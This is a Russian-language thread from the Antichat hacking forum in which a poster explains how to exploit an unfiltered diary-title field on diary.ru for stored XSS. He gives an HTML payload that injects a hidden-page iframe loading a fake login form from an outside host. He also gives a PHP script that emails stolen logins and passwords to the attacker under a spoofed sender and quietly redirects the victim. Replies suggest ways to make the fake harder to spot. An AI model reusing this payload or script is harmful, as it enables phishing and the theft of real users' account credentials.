Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Беспалевный фишинг (https://forum.antichat.xyz/showthread.php?t=48829)

XenOtai 11.09.2007 21:49
Беспалевный фишинг
 
Добрый вечер, с вами XenOtai.

Если вы внимательно следите за темой активных хсс, то наверняка видели найденную мной активку на diary.ru. Напомню, что находится она в названии дневника. Положим, вы украли куки, но Вам хочется большего. То есть пароля.
Но что, если он сложный и расшифровать его не удалось? Тогда первый выход, который приходит в голову – фишинг. Сделать фальшивую авторизацию, и как только чел зайдёт на свой дневник, его переадресует на сделанную нами форму.
Одна проблемка – адрес-то в адресной строке сменится на другой, пусть и похожий. Вы наверняка задавались вопросом, как же этого можно избежать.
Итак, заходим на дайри. Вбиваем <xss> в название дневника, бежим смотреть исходник – действительно, фильтрации 0. При этом наш тег выводится в параметре title:
Код:
<title>@дневники &mdash; <xss></title>
Итак, что нам надо осуществить? Нам нужно:
А) Фрейм в теле страницы.
Б) Скрыть всё лишнее.
Как скрыть лишнее? Оч просто:
Код:
<body style="visibility:hidden;">
Так как даже если посередине страницы поставить </body></html>, браузер всё равно отображает дальше, но учитывает параметры, различные в каждом теге, то наш стиль прекрасненько отобразиться! Теперь фрейм! Обычный фрейм не годится, поскольку он исчезнет вместе с боди, нам нужен iframe.
Итак, финальный код:

Код HTML:
</title><iframe src=http://fuckinghack.ru/auth.html location=top width="1003" height="1800" hspace=0 vspace=0><body style="visibility:hidden;">
Подбираем ширину и высоту по нашей нужде, фрейм отображает страницу, которая отошлёт данные нашему скрипту, который, обработав их, отошлёт на нашу почту.
Для тех, кто в танке, код скрипта (кто-то выкладывал на ачате :) ):

PHP код:
<? 
$to  "hacker@hacker.ru" ", " //ваше мыло 
$subject "Заход на diary.ru через ваш фейк"//тема сообщения 
$message "Через ваш фейк на мыло зашли 
Login: $login
Password: $passwd"//само сообщение. Если хотите изменить, то только верхнюю строчку. 
$otpravitel "M@IL Corp <admin@win.mail.ru>"

$headers  "MIME-Version: 1.0"
$headers .= "Content-type: text/$tipe; charset=windows-1251"
$headers .= "From: $otpravitel"
mail($to$subject$message$headers); //отправляем сообщение 

header("Location: http://diary.ru"); 
//при правильном вводе пароля жертва будет переадресовываться на дайри, как будто ничего не было (хорошо бы устроить переадресацию на какой-нибудь дневник, потому что адресная строка останется прежней), но вам отправится пароль 
exit; 
?>
Чего мы достигли: Фейк на дневнике, с адресом дневника. Пример (оптимизировано под 1024х768):
Код:
http://diary.ru/~roboboy/
«Удачи мне надо бежать а то я всю ночь не спал то что говорит что я убежал спать». (с) Dracula4ever

XenOtai special for Antichat.ru

Scipio 12.09.2007 01:17
Мдя... совсем для новичков, хотя это то же цель благородная... есть для энтих целей и более красивые методы... читай статьи на ачате... но мах репы поставлю, для начинающих мож быть полезно (увеличивает активность мозга)

halkfild 12.09.2007 01:30
все вроде нормально только убери скролл а то сильно палится.. + до того можно через жаба скрипт получать разрешение экрана и делать фрейм на всю страницу
тогда не будет трабл с пользовательскими разрешениями

Scipio 12.09.2007 01:58
Можно в статьи добавить, а то здесь потеряется... а некотрым может быть полезно

XenOtai 12.09.2007 02:03
Из статей перенесли сюда.


Время: 16:45